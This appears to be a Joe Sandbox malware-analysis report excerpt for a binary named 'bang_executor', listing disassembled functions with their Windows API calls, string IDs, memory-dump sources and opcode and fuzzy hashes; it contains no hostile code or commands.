                                        • _free.LIBCMT ref: 0050F222
                                        • _free.LIBCMT ref: 0050F230
                                        • _free.LIBCMT ref: 0050F23B
                                        • _free.LIBCMT ref: 0050F273
                                        • _free.LIBCMT ref: 0050F27A
                                        • _free.LIBCMT ref: 0050F297
                                        • _free.LIBCMT ref: 0050F2AF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID: h)R
                                        • API String ID: 161543041-2024205497
                                        • Opcode ID: a357c582ea9cf768ff9e64168b49adfc7172a1963b013a00e467877816e20a65
                                        • Instruction ID: 44b63b0259de36732188e90a6fa1581b8fa28e46905a308bace3964e77590a64
                                        • Opcode Fuzzy Hash: a357c582ea9cf768ff9e64168b49adfc7172a1963b013a00e467877816e20a65
                                        • Instruction Fuzzy Hash: 3E311A35600607EFEB31EA69D88AB9E7BE9BF81310F244429E44AD65D1DF71AD81CB10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FB631 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 126memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 004FB656
                                        • _wcslen.LIBCMT ref: 004FB6F6
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004FB705
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 004FB726
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                        • String ID: FjuKP$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                        • API String ID: 1116704506-3796409688
                                        • Opcode ID: d12ee91b8fc05f5d4c55acb61783d06f4ab2525aceadcf9dc3c0a6d66f1bbc57
                                        • Instruction ID: e0ba14e9efea7d9e3bc225ea2a00a9aa46514a0fdc7dbc5d8cec4464023827d9
                                        • Opcode Fuzzy Hash: d12ee91b8fc05f5d4c55acb61783d06f4ab2525aceadcf9dc3c0a6d66f1bbc57
                                        • Instruction Fuzzy Hash: 5F31E83110831A7AE725AB34DC4AFBF7B9CEFD6310F14051EF501962D2FB68994582AA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FF9EE Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 86windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindow.USER32(?,00000005), ref: 004FFA20
                                        • GetClassNameW.USER32(00000000,?,00000800), ref: 004FFA4C
                                          • Part of subcall function 004F4168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,004EE084,00000000,.exe,?,?,00000800,?,?,?,004FAD5D), ref: 004F417E
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 004FFA68
                                        • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 004FFA7F
                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 004FFA93
                                        • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 004FFABC
                                        • DeleteObject.GDI32(00000000), ref: 004FFAC3
                                        • GetWindow.USER32(00000000,00000002), ref: 004FFACC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                        • String ID: STATIC
                                        • API String ID: 3820355801-1882779555
                                        • Opcode ID: 8dfd24742852dbf13c60a8f75677e0593b9c5d6b5d74c8ba64a148feda2a1fd2
                                        • Instruction ID: ef1e2ce6b1ac00f56f202723e68f2b7e3e4f9d8835e6426a68b305572523d288
                                        • Opcode Fuzzy Hash: 8dfd24742852dbf13c60a8f75677e0593b9c5d6b5d74c8ba64a148feda2a1fd2
                                        • Instruction Fuzzy Hash: C3216D3694472C7BE620AB308C4AFFF369CAF5D704F000426FB45A6191DB78CD0996A9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050B8B1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 0050B8C5
                                          • Part of subcall function 0050BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0050EEE6,?,00000000,?,00000000,?,0050EF0D,?,00000007,?,?,0050F30A,?), ref: 0050BB10
                                          • Part of subcall function 0050BAFA: GetLastError.KERNEL32(?,?,0050EEE6,?,00000000,?,00000000,?,0050EF0D,?,00000007,?,?,0050F30A,?,?), ref: 0050BB22
                                        • _free.LIBCMT ref: 0050B8D1
                                        • _free.LIBCMT ref: 0050B8DC
                                        • _free.LIBCMT ref: 0050B8E7
                                        • _free.LIBCMT ref: 0050B8F2
                                        • _free.LIBCMT ref: 0050B8FD
                                        • _free.LIBCMT ref: 0050B908
                                        • _free.LIBCMT ref: 0050B913
                                        • _free.LIBCMT ref: 0050B91E
                                        • _free.LIBCMT ref: 0050B92C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 6d1f4c6da6f7daf6bb2a9bcfae28c8b6879a904fa865fa70e1264dee87241670
                                        • Instruction ID: 1797ed1000306d7523376c049cf2a4c1adf700b197b89acb115f9bb17ffcd6e5
                                        • Opcode Fuzzy Hash: 6d1f4c6da6f7daf6bb2a9bcfae28c8b6879a904fa865fa70e1264dee87241670
                                        • Instruction Fuzzy Hash: F411A77A20014AAFDB01EF99C9D6CDD3FB5FF44350B0180A5FA094B1A2DB71EA51DB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00505451 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                        • String ID: csm$csm$csm
                                        • API String ID: 322700389-393685449
                                        • Opcode ID: 35ff27130ee7caf4b16e03d0d29b7ef74c758fff299a2bb170ac369a22a70171
                                        • Instruction ID: 607d610f562bc660588860e9bb6a1f80f818d4298ac7e23567b7cff740bac2ff
                                        • Opcode Fuzzy Hash: 35ff27130ee7caf4b16e03d0d29b7ef74c758fff299a2bb170ac369a22a70171
                                        • Instruction Fuzzy Hash: F2B17771800A0AEFCF25DFA4C9859AFBFB5FF44310B14455AE8016B282E771EA51DFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004ECE64 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 202COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ClearH_prolog3Variant
                                        • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$fP
                                        • API String ID: 3629354427-3941458401
                                        • Opcode ID: 891fd1b4065166d79deb3fd935e4b8c63523e2c7d9e3aa45efd2e07d2424351b
                                        • Instruction ID: be92dfabea28958c5733b1e28e30b3627dfcb04703636f4a9e319bfd767cdc49
                                        • Opcode Fuzzy Hash: 891fd1b4065166d79deb3fd935e4b8c63523e2c7d9e3aa45efd2e07d2424351b
                                        • Instruction Fuzzy Hash: B8716B74A002599FDB14DFA5CC94DBFBBB9FF48711B04416EE516A72A0CB38AD02CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00511CDD Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00512452,00000000,00000000,00000000,00000000,00000000,?), ref: 00511D1F
                                        • __fassign.LIBCMT ref: 00511D9A
                                        • __fassign.LIBCMT ref: 00511DB5
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00511DDB
                                        • WriteFile.KERNEL32(?,00000000,00000000,R$Q,00000000,?,?,?,?,?,?,?,?,?,00512452,00000000), ref: 00511DFA
                                        • WriteFile.KERNEL32(?,00000000,00000001,R$Q,00000000,?,?,?,?,?,?,?,?,?,00512452,00000000), ref: 00511E33
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID: R$Q
                                        • API String ID: 1324828854-2113774344
                                        • Opcode ID: 4bd5085a5f5d060adcf9056ea5bb6c5a733c0c23accd2b2d3669892ecd10dab7
                                        • Instruction ID: 8999552401c835edaa69c19c8683e34df2e9a20e97002f90646999795435355a
                                        • Opcode Fuzzy Hash: 4bd5085a5f5d060adcf9056ea5bb6c5a733c0c23accd2b2d3669892ecd10dab7
                                        • Instruction Fuzzy Hash: 9951E875900645AFEB10CFA8DC45AEEBFF8FF09300F14455AEA51E7291D7309944CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FD8C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004E1366: GetDlgItem.USER32(00000000,00003021), ref: 004E13AA
                                          • Part of subcall function 004E1366: SetWindowTextW.USER32(00000000,005165F4), ref: 004E13C0
                                        • EndDialog.USER32(?,00000001), ref: 004FD910
                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 004FD937
                                        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 004FD950
                                        • SetWindowTextW.USER32(?,?), ref: 004FD961
                                        • GetDlgItem.USER32(?,00000065), ref: 004FD96A
                                        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 004FD97E
                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 004FD994
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: MessageSend$Item$TextWindow$Dialog
                                        • String ID: LICENSEDLG
                                        • API String ID: 3214253823-2177901306
                                        • Opcode ID: 11c0d1700fe6f27d00122b857c9846920f0ac1a1adb6856f9c5646923c884e89
                                        • Instruction ID: 812f3c1bb12563a4feebf804362f307c982a524fb55c864d396651c9fc79d03a
                                        • Opcode Fuzzy Hash: 11c0d1700fe6f27d00122b857c9846920f0ac1a1adb6856f9c5646923c884e89
                                        • Instruction Fuzzy Hash: F821267660420C7BD3115FA1EC4DFBB3B7DEB5BB49F00040AF300A21A0CBA69909E635
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EBF89 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 004EBFA3
                                          • Part of subcall function 004F34D7: GetSystemTime.KERNEL32(?,00000000), ref: 004F34EF
                                          • Part of subcall function 004F34D7: SystemTimeToFileTime.KERNEL32(?,?), ref: 004F34FD
                                          • Part of subcall function 004F3480: __aulldiv.LIBCMT ref: 004F3489
                                        • __aulldiv.LIBCMT ref: 004EBFCF
                                        • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,?,?), ref: 004EBFD6
                                        • _swprintf.LIBCMT ref: 004EC001
                                          • Part of subcall function 004E4C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004E4C13
                                        • _wcslen.LIBCMT ref: 004EC00B
                                        • _swprintf.LIBCMT ref: 004EC061
                                        • _wcslen.LIBCMT ref: 004EC06B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
                                        • String ID: %u.%03u
                                        • API String ID: 2956649372-1114938957
                                        • Opcode ID: 8df3a199756f1730afce0d06ab8357dc12b76fc314e8544b8c461de83d1f834b
                                        • Instruction ID: 63b5dfdecb94860bf49d4a85184484cabe6a6f0fb0644d49d4548ff463e16f14
                                        • Opcode Fuzzy Hash: 8df3a199756f1730afce0d06ab8357dc12b76fc314e8544b8c461de83d1f834b
                                        • Instruction Fuzzy Hash: A8218472A04341AFC624EF66CC85EAF7BECEBC4740F44491EF544D3241DA34DA088796
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FCBC8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 004FCBEE
                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 004FCC05
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 004FCC19
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 004FCC2A
                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 004FCC42
                                        • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 004FCC66
                                        • _swprintf.LIBCMT ref: 004FCC85
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Time$System$File$Format$DateLocalSpecific_swprintf
                                        • String ID: %s %s
                                        • API String ID: 385609497-2939940506
                                        • Opcode ID: 48cf1bd3d3c042f87777d6f4a88cf4688b7a379cc735872c7420764041b8c533
                                        • Instruction ID: ab308eb086da3a370757a73e0340e14c99d6089888506bbede67dc37f397b52a
                                        • Opcode Fuzzy Hash: 48cf1bd3d3c042f87777d6f4a88cf4688b7a379cc735872c7420764041b8c533
                                        • Instruction Fuzzy Hash: D8213BB254024CABDB20DFA1DD48EEF77BCEF59304F10456AFA09D7112E6349A09CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00502360 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,004ECEA9,004ECEAB,00000000,00000000,08ADEBCE,00000001,00000000,00000000,?,004ECD87,?,00000004,004ECEA9,ROOT\CIMV2), ref: 005023E9
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,004ECEA9,?,00000000,00000000,?,?,004ECD87,?,00000004,004ECEA9), ref: 00502464
                                        • SysAllocString.OLEAUT32(00000000), ref: 0050246F
                                        • _com_issue_error.COMSUPP ref: 00502498
                                        • _com_issue_error.COMSUPP ref: 005024A2
                                        • GetLastError.KERNEL32(80070057,08ADEBCE,00000001,00000000,00000000,?,004ECD87,?,00000004,004ECEA9,ROOT\CIMV2), ref: 005024A7
                                        • _com_issue_error.COMSUPP ref: 005024BA
                                        • GetLastError.KERNEL32(00000000,?,004ECD87,?,00000004,004ECEA9,ROOT\CIMV2), ref: 005024D0
                                        • _com_issue_error.COMSUPP ref: 005024E3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                        • String ID:
                                        • API String ID: 1353541977-0
                                        • Opcode ID: 081232117605d7050c336ea9459b5fd47c3d9a3dfd36a9ee58381791910e8784
                                        • Instruction ID: 567d544c5939e321f7c7b02b579de79875de234a2eb36ad44f71632c5049bfca
                                        • Opcode Fuzzy Hash: 081232117605d7050c336ea9459b5fd47c3d9a3dfd36a9ee58381791910e8784
                                        • Instruction Fuzzy Hash: 1441D571A00205ABDB149F68DC4DBEEBFA8FB48710F208629F905E72D1D775A844CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050C06A Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 305COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: __alldvrm$_strrchr
                                        • String ID: =zP$=zP$=zP
                                        • API String ID: 1036877536-2151294112
                                        • Opcode ID: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
                                        • Instruction ID: 8bc7965a7c4c9d3038356fd57e4822087ca460464cbbbd95d878199625cc55a4
                                        • Opcode Fuzzy Hash: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
                                        • Instruction Fuzzy Hash: D6A126769003869FEB25CF68C8917AEBFE5FF53350F1847A9E8959B2C2C2348941C750
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00504F20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON
                                        Download Yara Rule
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 00504F57
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00504F5F
                                        • _ValidateLocalCookies.LIBCMT ref: 00504FE8
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00505013
